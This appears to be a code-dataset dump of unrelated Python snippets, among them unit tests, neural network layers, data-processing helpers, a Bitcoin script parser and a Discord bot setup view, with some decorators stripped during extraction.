code
stringlengths
281
23.7M
def test_classmethod_from_builtins_inferred_as_bound() -> None: code = '\n import builtins\n\n class Foo():\n \n def bar1(cls, text):\n pass\n\n \n def bar2(cls, text):\n pass\n\n Foo.bar1 #\n Foo.bar2 #\n ' (first_node, second_node) = extract_node(code) assert isinstance(next(first_node.infer()), BoundMethod) assert isinstance(next(second_node.infer()), BoundMethod)
class ExternalCacheBatch(BatchBase): def __init__(self, cache, index): super(ExternalCacheBatch, self).__init__() self.cache = cache self.index = index def _try_switch_active_batch(self): if (self.cache._batch is self): self.cache._batch = ExternalCacheBatch(self.cache, (self.index + (1 if self.items else 0))) def _flush(self): self.cache._before_flush(self) self.cache._flush(self) def _cancel(self): self.cache._cancel_flush(self)
class UNetDown(nn.Module): def __init__(self, in_size, out_size, normalize=True, dropout=0.0): super(UNetDown, self).__init__() layers = [nn.Conv2d(in_size, out_size, 4, 2, 1, bias=False)] if normalize: layers.append(nn.InstanceNorm2d(out_size)) layers.append(nn.LeakyReLU(0.2)) if dropout: layers.append(nn.Dropout(dropout)) self.model = nn.Sequential(*layers) def forward(self, x): return self.model(x)
def scan_can_remove_outs(op, out_idxs): non_removable = [o for (i, o) in enumerate(op.inner_outputs) if (i not in out_idxs)] required_inputs = list(graph_inputs(non_removable)) out_ins = [] offset = op.info.n_seqs for (idx, tap) in enumerate(chain(op.info.mit_mot_in_slices, op.info.mit_sot_in_slices, op.info.sit_sot_in_slices)): n_ins = len(tap) out_ins += [op.inner_inputs[offset:(offset + n_ins)]] offset += n_ins out_ins += [[] for k in range(op.info.n_nit_sot)] out_ins += [[op.inner_inputs[(offset + k)]] for k in range(op.info.n_shared_outs)] added = True out_idxs_mask = [1 for idx in out_idxs] while added: added = False for (pos, idx) in enumerate(out_idxs): if (out_idxs_mask[pos] and any(((x in required_inputs) for x in out_ins[idx]))): out_idxs_mask[pos] = 0 required_inputs += list(graph_inputs([op.inner_outputs[idx]])) added = True required_outs = [x for (i, x) in enumerate(out_idxs) if (out_idxs_mask[i] == 0)] not_required = [x for (i, x) in enumerate(out_idxs) if (out_idxs_mask[i] == 1)] return (required_outs, not_required)
def obtian_tes(): test_ids = [] test_seqs = [] test_dates = [] for (s, date) in tes_sess: seq = sess_clicks[s] outseq = [] for i in seq: if (i in item_dict): outseq += [item_dict[i]] if (len(outseq) < 2): continue test_ids += [s] test_dates += [date] test_seqs += [outseq] return (test_ids, test_dates, test_seqs)
def main(client, config): item_df = benchmark(read_tables, config=config, compute_result=config['get_read_time']) f_item_df = item_df[item_df['i_category_id'].notnull()].reset_index(drop=True) web_clickstream_flist = glob.glob(os.path.join(config['data_dir'], 'web_clickstreams/*.parquet')) task_ls = [delayed(pre_repartition_task)(fn, f_item_df.to_delayed()[0]) for fn in web_clickstream_flist] meta_d = {'wcs_user_sk': np.ones(1, dtype=np.int64), 'tstamp_inSec': np.ones(1, dtype=np.int64), 'i_category_id': np.ones(1, dtype=np.int8)} meta_df = cudf.DataFrame(meta_d) merged_df = dask_cudf.from_delayed(task_ls, meta=meta_df) merged_df = merged_df.shuffle(on=['wcs_user_sk']) distinct_session_df = merged_df.map_partitions(get_distinct_sessions, keep_cols=['wcs_user_sk', 'i_category_id'], time_out=q30_session_timeout_inSec) del merged_df pair_df = distinct_session_df.map_partitions(get_pairs, pair_col='i_category_id', output_col_1='category_id_1', output_col_2='category_id_2') del distinct_session_df grouped_df = pair_df.groupby(['category_id_1', 'category_id_2']).size(split_every=2).reset_index() grouped_df.columns = ['category_id_1', 'category_id_2', 'cnt'] result_df = grouped_df.repartition(npartitions=1).persist() result_df = result_df.map_partitions((lambda x: x.sort_values('cnt', ascending=False))) result_df = result_df.reset_index(drop=True).head(q30_limit) return result_df
class VanSpatialAttentionLayer(nn.Module): def __init__(self, hidden_size: int, hidden_act: str='gelu'): super().__init__() self.pre_projection = nn.Sequential(OrderedDict([('conv', nn.Conv2d(hidden_size, hidden_size, kernel_size=1)), ('act', ACT2FN[hidden_act])])) self.attention_layer = VanLargeKernelAttentionLayer(hidden_size) self.post_projection = nn.Conv2d(hidden_size, hidden_size, kernel_size=1) def forward(self, hidden_state): residual = hidden_state hidden_state = self.pre_projection(hidden_state) hidden_state = self.attention_layer(hidden_state) hidden_state = self.post_projection(hidden_state) hidden_state = (hidden_state + residual) return hidden_state
_kernel_api(params={'_identifier': POINTER, '_callback': POINTER, '_idata': POINTER}) def hook__kauth_listen_scope(ql, address, params): ev_name = ql.mem.string(params['_identifier']).replace('com.', '').replace('apple.', '').upper().replace('.', '_') ql.os.ev_manager.register(params['_callback'], ev_name.encode(), MacOSEventType[('EV_' + ev_name)]) ql.log.debug(('New kauth callback has been registered: %s' % ev_name)) return params['_identifier']
def test_supp_shape_from_ref_param_shape(): with pytest.raises(ValueError, match='^ndim_supp*'): supp_shape_from_ref_param_shape(ndim_supp=0, dist_params=(np.array([1, 2]), 0), ref_param_idx=0) res = supp_shape_from_ref_param_shape(ndim_supp=1, dist_params=(np.array([1, 2]), np.eye(2)), ref_param_idx=0) assert (res == (2,)) res = supp_shape_from_ref_param_shape(ndim_supp=1, dist_params=(np.array([1, 2]), 0), param_shapes=((2,), ()), ref_param_idx=0) assert (res == (2,)) with pytest.raises(ValueError, match='^Reference parameter*'): supp_shape_from_ref_param_shape(ndim_supp=1, dist_params=(np.array(1),), ref_param_idx=0) res = supp_shape_from_ref_param_shape(ndim_supp=2, dist_params=(np.array([1, 2]), np.ones((2, 3, 4))), ref_param_idx=1) assert (res == (3, 4)) res = supp_shape_from_ref_param_shape(ndim_supp=2, dist_params=(np.array([1, 2]), np.ones((2, 3, 4))), param_shapes=((2,), (2, 3, 4)), ref_param_idx=1) assert (res == (3, 4))
_if_asan_class class ConstructParameterShardingAndShardTest(MultiProcessTestBase): (per_param_sharding=st.sampled_from([{'table_0': data_parallel(), 'table_1': data_parallel()}, {'table_0': table_wise(rank=0), 'table_1': table_wise(rank=1)}, {'table_0': row_wise(), 'table_1': row_wise()}, {'table_0': column_wise(ranks=[0, 1]), 'table_1': column_wise(ranks=[0, 1])}])) (verbosity=Verbosity.verbose, max_examples=8, deadline=None) def test_parameter_sharding_ebc(self, per_param_sharding: Dict[(str, ParameterShardingGenerator)]) -> None: WORLD_SIZE = 2 embedding_bag_config = [EmbeddingBagConfig(name='table_0', feature_names=['feature_0'], embedding_dim=16, num_embeddings=4), EmbeddingBagConfig(name='table_1', feature_names=['feature_1'], embedding_dim=16, num_embeddings=4)] kjt_input_per_rank = [KeyedJaggedTensor.from_lengths_sync(keys=['feature_0', 'feature_1'], values=torch.LongTensor([0, 1, 2, 0, 1, 2]), lengths=torch.LongTensor([2, 0, 1, 2, 0, 1])), KeyedJaggedTensor.from_lengths_sync(keys=['feature_0', 'feature_1'], values=torch.LongTensor([3, 2, 1, 2, 0, 1, 2, 3, 2, 3, 2]), lengths=torch.LongTensor([2, 2, 4, 2, 0, 1]))] module_sharding_plan = construct_module_sharding_plan(EmbeddingBagCollection(tables=embedding_bag_config), per_param_sharding=per_param_sharding, local_size=WORLD_SIZE, world_size=WORLD_SIZE, device_type=('cuda' if torch.cuda.is_available() else 'cpu')) if ((not torch.cuda.is_available()) and (module_sharding_plan['table_0'].sharding_type == ShardingType.ROW_WISE.value)): return self._run_multi_process_test(callable=_test_sharding, world_size=WORLD_SIZE, tables=embedding_bag_config, initial_state_dict={'embedding_bags.table_0.weight': torch.Tensor([([1] * 16), ([2] * 16), ([3] * 16), ([4] * 16)]), 'embedding_bags.table_1.weight': torch.Tensor([([101] * 16), ([102] * 16), ([103] * 16), ([104] * 16)])}, kjt_input_per_rank=kjt_input_per_rank, backend=('nccl' if torch.cuda.is_available() else 'gloo'), module_sharding_plan=module_sharding_plan)
class TestValidFormats(unittest.TestCase): def test_wav(self): self.assertIn('wav', core.VALID_FORMATS) def test_aiff(self): self.assertIn('aiff', core.VALID_FORMATS) def test_notin(self): self.assertNotIn('AUDIO', core.VALID_FORMATS) self.assertNotIn('FILE', core.VALID_FORMATS) self.assertNotIn('FORMATS', core.VALID_FORMATS) self.assertNotIn('AUDIO FILE FORMATS', core.VALID_FORMATS)
class QCModel(_QCBase): method: str basis: (str | QCBasisSet) def from_dict(cls, data: dict[(str, Any)]) -> QCModel: basis: ((str | dict[(str, Any)]) | QCBasisSet) = data.pop('basis') if isinstance(basis, dict): basis = QCBasisSet.from_dict(basis) return cls(**data, basis=basis) def to_hdf5(self, group: h5py.Group) -> None: if isinstance(self.basis, QCBasisSet): basis_group = group.require_group('basis') self.basis.to_hdf5(basis_group) else: group.attrs['basis'] = self.basis group.attrs['method'] = self.method def _from_hdf5_group(cls, h5py_group: h5py.Group) -> QCModel: basis: (str | QCBasisSet) if ('basis' in h5py_group.keys()): basis = cast(QCBasisSet, QCBasisSet.from_hdf5(h5py_group['basis'])) else: basis = h5py_group.attrs['basis'] return cls(method=h5py_group.attrs['method'], basis=basis)
def read_object_labels_csv(file, header=True): images = [] num_categories = 0 print('[dataset] read', file) with open(file, 'r') as f: reader = csv.reader(f) rownum = 0 for row in reader: if (header and (rownum == 0)): header = row else: if (num_categories == 0): num_categories = (len(row) - 1) name = row[0] labels = np.asarray(row[1:(num_categories + 1)]).astype(np.float32) labels = torch.from_numpy(labels) item = (name, labels) images.append(item) rownum += 1 return images
def test_view_functions_arent_modified_globally(): class MyView(View): pass blueprint = Blueprint('test', __name__) blueprint.add_url_rule('/', view_func=MyView.as_view('view')) app = Flask(__name__) app.register_blueprint(blueprint) FlaskInjector(app=app) app2 = Flask(__name__) app2.register_blueprint(blueprint) FlaskInjector(app=app2)
def get_optimizer(optim_config, parameters): if (optim_config.optimizer == 'Adam'): return torch.optim.Adam(parameters, lr=optim_config.lr, weight_decay=optim_config.weight_decay, betas=(optim_config.beta1, 0.999)) elif (optim_config.optimizer == 'RMSProp'): return torch.optim.RMSprop(parameters, lr=optim_config.lr, weight_decay=optim_config.weight_decay) elif (optim_config.optimizer == 'SGD'): return torch.optim.SGD(parameters, lr=optim_config.lr, momentum=0.9) else: return NotImplementedError('Optimizer {} not understood.'.format(optim_config.optimizer))
class Effect4461(BaseEffect): runTime = 'early' type = 'passive' def handler(fit, implant, context, projectionRange, **kwargs): fit.appliedImplants.filteredItemMultiply((lambda target: target.item.requiresSkill('Cybernetics')), 'scanMagnetometricStrengthModifier', implant.getModifiedItemAttr('implantSetLGFederationNavy'), **kwargs)
.parametrize('version, expected', [('1', '1.0.1'), ('1.2', '1.2.1'), ('1.2.3', '1.2.4'), ('2!1.2.3', '2!1.2.4'), ('1.2.3+local', '1.2.4'), ('1.2.3.4', '1.2.4.0'), ('1.dev0', '1'), ('1.2dev0', '1.2'), ('1.2.3dev0', '1.2.3'), ('1.2.3.4dev0', '1.2.4.0'), ('1.post1', '1.0.1'), ('1.2.post1', '1.2.1'), ('1.2.3.post1', '1.2.4'), ('1.post1.dev0', '1.0.1'), ('1.2.post1.dev0', '1.2.1'), ('1.2.3.post1.dev0', '1.2.4'), ('1.a1', '1'), ('1.2a1', '1.2'), ('1.2.3a1', '1.2.3'), ('1.2.3.4a1', '1.2.4.0'), ('1.a1.post2', '1'), ('1.2a1.post2', '1.2'), ('1.2.3a1.post2', '1.2.3'), ('1.2.3.4a1.post2', '1.2.4.0'), ('1.a1.post2.dev0', '1'), ('1.2a1.post2.dev0', '1.2'), ('1.2.3a1.post2.dev0', '1.2.3'), ('1.2.3.4a1.post2.dev0', '1.2.4.0')]) def test_next_patch(version: str, expected: str) -> None: v = PEP440Version.parse(version) assert (v.next_patch().text == expected)
def RSU5(x, mid_ch=12, out_ch=3): x0 = REBNCONV(x, out_ch, 1) x1 = REBNCONV(x0, mid_ch, 1) x = MaxPool2D(2, 2)(x1) x2 = REBNCONV(x, mid_ch, 1) x = MaxPool2D(2, 2)(x2) x3 = REBNCONV(x, mid_ch, 1) x = MaxPool2D(2, 2)(x3) x4 = REBNCONV(x, mid_ch, 1) x = REBNCONV(x, mid_ch, 2) x = REBNCONV(tf.concat([x, x4], axis=(- 1)), mid_ch, 1) x = _upsample_like(x, x3) x = REBNCONV(tf.concat([x, x3], axis=(- 1)), mid_ch, 1) x = _upsample_like(x, x2) x = REBNCONV(tf.concat([x, x2], axis=(- 1)), mid_ch, 1) x = _upsample_like(x, x1) x = REBNCONV(tf.concat([x, x1], axis=(- 1)), out_ch, 1) return (x + x0)
.parametrize('verbosity', (0, 1, 2)) .parametrize('use_report_result_path', (False, True)) def test_json_format_success(capsys, verbosity, use_report_result_path): reporter = JsonReporter(verbosity=verbosity, pretty=False) if use_report_result_path: reporter.report_result(_make_success_result()) else: reporter.report_success(_make_success_result()) captured = capsys.readouterr() assert (captured.err == '') if (verbosity == 0): assert (captured.out == '{"status":"ok"}\n') elif (verbosity == 1): assert (captured.out == '{"status":"ok","errors":[]}\n') else: assert (captured.out == '{"status":"ok","errors":[],"checked_paths":["foo.json"]}\n')
class MessageAPI(ABC): code: bytes _code_address: Address create_address: Address data: BytesOrView depth: int gas: int is_static: bool sender: Address should_transfer_value: bool _storage_address: Address to: Address value: int gas_price: int __slots__ = ['code', '_code_address', 'create_address', 'data', 'depth', 'gas', 'is_static', 'sender', 'should_transfer_value', '_storage_addressto', 'value'] def code_address(self) -> Address: ... def storage_address(self) -> Address: ... def is_create(self) -> bool: ... def data_as_bytes(self) -> bytes: ...
def compute_f1_score(preds, gts, ignores=[]): C = preds.size(1) classes = torch.LongTensor(sorted((set(range(C)) - set(ignores)))) hist = torch.bincount(((gts * C) + preds.argmax(1)), minlength=(C ** 2)).view(C, C).float() diag = torch.diag(hist) recalls = (diag / hist.sum(1).clamp(min=1)) precisions = (diag / hist.sum(0).clamp(min=1)) f1 = (((2 * recalls) * precisions) / (recalls + precisions).clamp(min=1e-08)) return f1[classes].cpu().numpy()
.bedtools .parametrize('nearest_how,overlap,strandedness', product(nearest_hows, overlaps, strandedness)) (max_examples=max_examples, deadline=deadline, print_blob=True, suppress_health_check=HealthCheck.all()) (gr=dfs_min(), gr2=dfs_min()) def test_nearest(gr, gr2, nearest_how, overlap, strandedness): nearest_command = 'bedtools closest {bedtools_how} {strand} {overlap} -t first -d -a <(sort -k1,1 -k2,2n {f1}) -b <(sort -k1,1 -k2,2n {f2})' bedtools_result = run_bedtools(nearest_command, gr, gr2, strandedness, overlap, nearest_how) bedtools_df = pd.read_csv(StringIO(bedtools_result), header=None, names='Chromosome Start End Strand Chromosome2 Distance'.split(), usecols=[0, 1, 2, 5, 6, 12], sep='\t') bedtools_df.Distance = bedtools_df.Distance.abs() bedtools_df = bedtools_df[(bedtools_df.Chromosome2 != '.')] bedtools_df = bedtools_df.drop('Chromosome2', axis=1) result = gr.nearest(gr2, strandedness=strandedness, overlap=overlap, how=nearest_how) print(('bedtools ' * 5)) print(bedtools_df) print(('result ' * 5)) print(result) compare_results_nearest(bedtools_df, result)
class TeamCompulsion(TourneyButton): def __init__(self, ctx: Context, letter: str): super().__init__(emoji=ri(letter)) self.ctx = ctx async def callback(self, interaction: discord.Interaction): (await interaction.response.defer()) self.view.record.teamname_compulsion = (not self.view.record.teamname_compulsion) (await self.ctx.success(f"Now Team Name **{('is' if self.view.record.teamname_compulsion else 'is not')}** required to register.", 3)) (await self.view.refresh_view())
def stop_memory_tracing(memory_trace: Optional[MemoryTrace]=None, ignore_released_memory: bool=True) -> Optional[MemorySummary]: global _is_memory_tracing_enabled _is_memory_tracing_enabled = False if ((memory_trace is not None) and (len(memory_trace) > 1)): memory_diff_trace = [] memory_curr_trace = [] cumulative_memory_dict = defaultdict((lambda : [0, 0, 0])) for ((frame, cpu_mem, gpu_mem), (next_frame, next_cpu_mem, next_gpu_mem)) in zip(memory_trace[:(- 1)], memory_trace[1:]): cpu_mem_inc = (next_cpu_mem - cpu_mem) gpu_mem_inc = (next_gpu_mem - gpu_mem) cpu_gpu_mem_inc = (cpu_mem_inc + gpu_mem_inc) memory_diff_trace.append(MemoryState(frame=frame, cpu=Memory(cpu_mem_inc), gpu=Memory(gpu_mem_inc), cpu_gpu=Memory(cpu_gpu_mem_inc))) memory_curr_trace.append(MemoryState(frame=frame, cpu=Memory(next_cpu_mem), gpu=Memory(next_gpu_mem), cpu_gpu=Memory((next_gpu_mem + next_cpu_mem)))) cumulative_memory_dict[frame][0] += cpu_mem_inc cumulative_memory_dict[frame][1] += gpu_mem_inc cumulative_memory_dict[frame][2] += cpu_gpu_mem_inc cumulative_memory = sorted(list(cumulative_memory_dict.items()), key=(lambda x: x[1][2]), reverse=True) cumulative_memory = list((MemoryState(frame=frame, cpu=Memory(cpu_mem_inc), gpu=Memory(gpu_mem_inc), cpu_gpu=Memory(cpu_gpu_mem_inc)) for (frame, (cpu_mem_inc, gpu_mem_inc, cpu_gpu_mem_inc)) in cumulative_memory)) memory_curr_trace = sorted(memory_curr_trace, key=(lambda x: x.cpu_gpu.bytes), reverse=True) if ignore_released_memory: total_memory = sum((max(0, step_trace.cpu_gpu.bytes) for step_trace in memory_diff_trace)) else: total_memory = sum((step_trace.cpu_gpu.bytes for step_trace in memory_diff_trace)) total_memory = Memory(total_memory) return MemorySummary(sequential=memory_diff_trace, cumulative=cumulative_memory, current=memory_curr_trace, total=total_memory) return None
def script_GetOp(_bytes: bytes): i = 0 while (i < len(_bytes)): vch = None opcode = _bytes[i] i += 1 if (opcode <= opcodes.OP_PUSHDATA4): nSize = opcode if (opcode == opcodes.OP_PUSHDATA1): try: nSize = _bytes[i] except IndexError: raise MalformedBitcoinScript() i += 1 elif (opcode == opcodes.OP_PUSHDATA2): try: (nSize,) = struct.unpack_from('<H', _bytes, i) except struct.error: raise MalformedBitcoinScript() i += 2 elif (opcode == opcodes.OP_PUSHDATA4): try: (nSize,) = struct.unpack_from('<I', _bytes, i) except struct.error: raise MalformedBitcoinScript() i += 4 vch = _bytes[i:(i + nSize)] i += nSize (yield (opcode, vch, i))
def initial_player_response(watch_html: str) -> str: patterns = ['window\\[[\'\\"]ytInitialPlayerResponse[\'\\"]]\\s*=\\s*', 'ytInitialPlayerResponse\\s*=\\s*'] for pattern in patterns: try: return parse_for_object(watch_html, pattern) except HTMLParseError: pass raise RegexMatchError(caller='initial_player_response', pattern='initial_player_response_pattern')
def _create_actor(rank: int, num_actors: int, num_cpus_per_actor: int, num_gpus_per_actor: int, resources_per_actor: Optional[Dict]=None, placement_group: Optional[PlacementGroup]=None, queue: Optional[Queue]=None, checkpoint_frequency: int=5, distributed_callbacks: Optional[Sequence[DistributedCallback]]=None) -> ActorHandle: actor_cls = _RemoteRayXGBoostActor.options(num_cpus=num_cpus_per_actor, num_gpus=num_gpus_per_actor, resources=resources_per_actor, scheduling_strategy=PlacementGroupSchedulingStrategy(placement_group=(placement_group or DEFAULT_PG), placement_group_capture_child_tasks=True)) return actor_cls.remote(rank=rank, num_actors=num_actors, queue=queue, checkpoint_frequency=checkpoint_frequency, distributed_callbacks=distributed_callbacks)
class TestVector(TestCase): def setUp(self): self.x = np.array([[1], [2], [3]]) self.vect = pybamm.Vector(self.x) def test_array_wrapper(self): self.assertEqual(self.vect.ndim, 2) self.assertEqual(self.vect.shape, (3, 1)) self.assertEqual(self.vect.size, 3) def test_column_reshape(self): vect1d = pybamm.Vector(np.array([1, 2, 3])) np.testing.assert_array_equal(self.vect.entries, vect1d.entries) def test_list_entries(self): vect = pybamm.Vector([1, 2, 3]) np.testing.assert_array_equal(vect.entries, np.array([[1], [2], [3]])) vect = pybamm.Vector([[1], [2], [3]]) np.testing.assert_array_equal(vect.entries, np.array([[1], [2], [3]])) def test_vector_evaluate(self): np.testing.assert_array_equal(self.vect.evaluate(), self.x) def test_vector_operations(self): np.testing.assert_array_equal((self.vect + self.vect).evaluate(), (2 * self.x)) np.testing.assert_array_equal((self.vect - self.vect).evaluate(), (0 * self.x)) np.testing.assert_array_equal((self.vect * self.vect).evaluate(), np.array([[1], [4], [9]])) def test_wrong_size_entries(self): with self.assertRaisesRegex(ValueError, 'Entries must have 1 dimension or be column vector'): pybamm.Vector(np.ones((4, 5)))
class BasicBlock(nn.Module): expansion = 1 def __init__(self, inplanes, planes, stride=1, downsample=None): super().__init__() self.conv1 = conv3x3(inplanes, planes, stride) self.bn1 = nn.BatchNorm2d(planes) self.relu = nn.ReLU(inplace=True) self.conv2 = conv3x3(planes, planes) self.bn2 = nn.BatchNorm2d(planes) self.downsample = downsample self.stride = stride def forward(self, x): residual = x out = self.conv1(x) out = self.bn1(out) out = self.relu(out) out = self.conv2(out) out = self.bn2(out) if (self.downsample is not None): residual = self.downsample(x) out += residual out = self.relu(out) return out
def run(model): if (pygraphviz is None): raise ImportError('pygraphviz library is required to run this function') pysb.bng.generate_equations(model) graph = pygraphviz.AGraph(directed=True, rankdir='LR') ic_species = [ic.pattern for ic in model.initials] for (i, cp) in enumerate(model.species): species_node = ('s%d' % i) slabel = re.sub('% ', '%\\\\l', str(cp)) slabel += '\\l' color = '#ccffcc' if len([s for s in ic_species if s.is_equivalent_to(cp)]): color = '#aaffff' graph.add_node(species_node, label=species_node, shape='Mrecord', fillcolor=color, style='filled', color='transparent', fontsize='12', margin='0.06,0') for (i, reaction) in enumerate(model.reactions): reactants = set(reaction['reactants']) products = set(reaction['products']) attr_reversible = {} for s in reactants: for p in products: r_link(graph, s, p, **attr_reversible) return graph.string()
(wrapper=True, tryfirst=True) def pytest_runtest_protocol(item: Item) -> Generator[(None, object, object)]: ihook = item.ihook def callbinrepr(op, left: object, right: object) -> Optional[str]: hook_result = ihook.pytest_assertrepr_compare(config=item.config, op=op, left=left, right=right) for new_expl in hook_result: if new_expl: new_expl = truncate.truncate_if_required(new_expl, item) new_expl = [line.replace('\n', '\\n') for line in new_expl] res = '\n~'.join(new_expl) if (item.config.getvalue('assertmode') == 'rewrite'): res = res.replace('%', '%%') return res return None saved_assert_hooks = (util._reprcompare, util._assertion_pass) util._reprcompare = callbinrepr util._config = item.config if ihook.pytest_assertion_pass.get_hookimpls(): def call_assertion_pass_hook(lineno: int, orig: str, expl: str) -> None: ihook.pytest_assertion_pass(item=item, lineno=lineno, orig=orig, expl=expl) util._assertion_pass = call_assertion_pass_hook try: return (yield) finally: (util._reprcompare, util._assertion_pass) = saved_assert_hooks util._config = None
class MultiNonBlockingLeaseTest(KazooLeaseTests): def test_1_renew(self): ls = self.client.MultiNonBlockingLease(1, self.path, datetime.timedelta(seconds=4), utcnow=self.clock) assert ls self.clock.forward(2) ls2 = MultiNonBlockingLease(self.client, 1, self.path, datetime.timedelta(seconds=4), utcnow=self.clock) assert ls2 def test_1_reject(self): ls = MultiNonBlockingLease(self.client, 1, self.path, datetime.timedelta(seconds=4), utcnow=self.clock) assert ls self.clock.forward(2) ls2 = MultiNonBlockingLease(self.client2, 1, self.path, datetime.timedelta(seconds=4), identifier='some.other.host', utcnow=self.clock) assert (not ls2) def test_2_renew(self): ls = MultiNonBlockingLease(self.client, 2, self.path, datetime.timedelta(seconds=7), utcnow=self.clock) assert ls self.clock.forward(2) ls2 = MultiNonBlockingLease(self.client2, 2, self.path, datetime.timedelta(seconds=7), identifier='host2', utcnow=self.clock) assert ls2 self.clock.forward(2) ls3 = MultiNonBlockingLease(self.client, 2, self.path, datetime.timedelta(seconds=7), utcnow=self.clock) assert ls3 self.clock.forward(2) ls4 = MultiNonBlockingLease(self.client2, 2, self.path, datetime.timedelta(seconds=7), identifier='host2', utcnow=self.clock) assert ls4 def test_2_reject(self): ls = MultiNonBlockingLease(self.client, 2, self.path, datetime.timedelta(seconds=7), utcnow=self.clock) assert ls self.clock.forward(2) ls2 = MultiNonBlockingLease(self.client2, 2, self.path, datetime.timedelta(seconds=7), identifier='host2', utcnow=self.clock) assert ls2 self.clock.forward(2) ls3 = MultiNonBlockingLease(self.client3, 2, self.path, datetime.timedelta(seconds=7), identifier='host3', utcnow=self.clock) assert (not ls3) def test_2_handover(self): ls = MultiNonBlockingLease(self.client, 2, self.path, datetime.timedelta(seconds=4), utcnow=self.clock) assert ls self.clock.forward(2) ls2 = MultiNonBlockingLease(self.client2, 2, self.path, datetime.timedelta(seconds=4), identifier='host2', utcnow=self.clock) assert ls2 self.clock.forward(3) ls3 = MultiNonBlockingLease(self.client3, 2, self.path, datetime.timedelta(seconds=4), identifier='host3', utcnow=self.clock) assert ls3 self.clock.forward(2) ls4 = MultiNonBlockingLease(self.client, 2, self.path, datetime.timedelta(seconds=4), utcnow=self.clock) assert ls4
def multiply_fixed_point_float_by_int(fp_int: int, intg: int, width_float: int, width_int: int) -> int: assert (width_float >= width_int) result = 0 for (l, lambda_l) in enumerate(f'{intg:0{width_int}b}'): for (k, kappa_k) in enumerate(f'{fp_int:0{width_float}b}'): result += ((int(lambda_l) * int(kappa_k)) * (2 ** ((((width_int + width_float) - l) - k) - 2))) return result
class ScrimsSlotManagerSetup(EsportsBaseView): def __init__(self, ctx: Context): super().__init__(ctx, timeout=60, title='Scrims Slot Manager') self.ctx = ctx self.bot: Quotient = ctx.bot async def initial_message(guild: discord.Guild): records = (await ScrimsSlotManager.filter(guild_id=guild.id)) _to_show = [f'`{idx}.` {_.__str__()}' for (idx, _) in enumerate(records, start=1)] _sm = ('\n'.join(_to_show) if _to_show else '```Click add-channel to set cancel-claim.```') _e = discord.Embed(color=65459, title=f'Scrims Slot-Manager Setup') _e.description = f'''Slot-Manager is a way to ease-up scrims slot management process. With Quotient's slotm users can - cancel their slot, claim an empty slot and also set reminder for vacant slots, All without bugging any mod. **Current slot-manager channels:** {_sm} Don't forget to set the match times :)''' return _e .button(label='Add Channel', custom_id='scrims_slotm_addc', emoji=emote.TextChannel) async def add_channel(self, interaction: discord.Interaction, button: discord.Button): (await interaction.response.defer()) if (not (await self.ctx.is_premium_guild())): if ((await ScrimsSlotManager.filter(guild_id=self.ctx.guild.id).count()) >= 1): return (await self.ctx.premium_mango('You need Quotient Premium to add more than 1 Slot-Manager channel.')) available_scrims = (await ScrimsSlotManager.available_scrims(self.ctx.guild)) if (not available_scrims): return (await self.error_embed(f'''There are no scrims available for a new slotmanager channel. If you have other slot-m channel, first remove the scrims from that channel to add them to new slot-m.''')) available_scrims = available_scrims[:25] _view = ScrimSelectorView(interaction.user, available_scrims, placeholder='Select scrims to add to slot-manager ...') (await interaction.followup.send("Choose 1 or multiple scrims that you want to add to new slot-manager.\n\n`If a scrim isn't in the dropdown that means it has been addded to another slotm.`", view=_view, ephemeral=True)) (await _view.wait()) prompt = Prompt(interaction.user.id) (await interaction.followup.send('A new channel will be created for the selected scrims slot manager.\n\n`Do you want to continue?`', view=prompt, ephemeral=True)) (await prompt.wait()) if (not prompt.value): return (await interaction.followup.send('Alright, Aborting.', ephemeral=True)) slotm = ScrimsSlotManager(scrim_ids=_view.custom_id, guild_id=interaction.guild_id) self.record = (await slotm.setup(self.ctx.guild, interaction.user)) (await self.ctx.success(f'''Successfully setup slotm for selected scrims in {self.record.main_channel.mention}. `You can rename this channel if you want to.`''', 10)) .button(label='Edit Config', custom_id='scrims_slotm_editc', emoji=emote.edit) async def edit_config(self, interaction: discord.Interaction, button: discord.Button): (await interaction.response.defer()) records = (await ScrimsSlotManager.filter(guild_id=self.ctx.guild.id)) if (not records): return (await self.ctx.error("You haven't added any slot-manager channel yet.\n\nClick `Add Channel` to add a new slot-m channel.", 2)) _view = QuotientView(self.ctx) _view.add_item(ScrimsSlotmSelector(records)) (await interaction.followup.send('Kindly choose a slot-manager channel to edit.', view=_view, ephemeral=True)) (await _view.wait()) if _view.custom_id: __record = (await ScrimsSlotManager.get(pk=_view.custom_id)) __editor_view = ScrimsSlotmEditor(self.ctx, record=__record) __editor_view.add_item(QuotientView.tricky_invite_button()) __editor_view.message = (await interaction.followup.send(embed=__editor_view.initial_embed(), view=__editor_view)) .button(emoji='', label='Match Time', custom_id='scrims_slotm_matcht') async def set_match_time(self, interaction: discord.Interaction, button: discord.Button): (await interaction.response.defer()) scrims = (await Scrim.filter(guild_id=self.ctx.guild.id).order_by('open_time')) _to_show = [f"{idx}) {getattr(_.registration_channel, 'name', 'deleted-channel').ljust(18)} {(_.match_time.strftime('%I:%M %p') if _.match_time else 'Not-Set')}" for (idx, _) in enumerate(scrims, start=1)] _to_show.insert(0, f''' {'Scrims'.ljust(18)} Match Time ''') _e = discord.Embed(color=self.ctx.bot.color, title='Scrims-Match time', url=self.bot.config.SERVER_LINK) _to_show = '\n'.join(_to_show) _e.description = f'''Match time means the time when `ID/Pass` of that particular scrim is shared. ```{_to_show}```''' _e.set_footer(text='Users cannot cancel/claim slots after this time.', icon_url=self.ctx.guild.me.display_avatar.url) _view = QuotientView(self.ctx) _view.add_item(MatchTimeEditor(self.ctx)) _view.add_item(QuotientView.tricky_invite_button()) _view.message = (await interaction.followup.send(embed=_e, view=_view, ephemeral=True))
def test_feedback_oper(): checker = Feedback_Checker_Coefficient(stacked=False) checker.state = basis(2, 1) qevo = QobjEvo([qeye(2), checker], args={'e_val': SESolver.ExpectFeedback(qeye(2), default=1.0), 'data': SESolver.StateFeedback(default=checker.state.data, raw_data=True), 'qobj': SESolver.StateFeedback(default=checker.state)}) checker.state = rand_ket(2) qevo.expect(0, checker.state) checker.state = rand_ket(2) qevo.expect(0, checker.state) checker.state = rand_ket(2) qevo.matmul_data(0, checker.state.data) checker.state = rand_ket(2) qevo.matmul_data(0, checker.state.data)
